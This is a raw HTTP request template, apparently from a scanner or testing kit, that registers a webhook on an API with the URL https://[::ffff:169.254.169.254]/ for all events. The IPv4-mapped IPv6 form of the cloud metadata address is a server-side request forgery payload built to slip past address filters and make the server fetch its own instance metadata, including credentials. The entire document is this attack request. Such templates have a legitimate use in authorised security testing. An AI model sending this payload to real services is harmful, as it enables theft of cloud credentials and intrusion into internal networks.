POST /v1/webhooks HTTP/1.1
Host: {{HOST}}
Authorization: Bearer {{TOKEN}}
Connection: close
Content-Type: application/json
Content-Length: {{CL}}

{"url":"https://[::ffff:169.254.169.254]/","events":["*"]}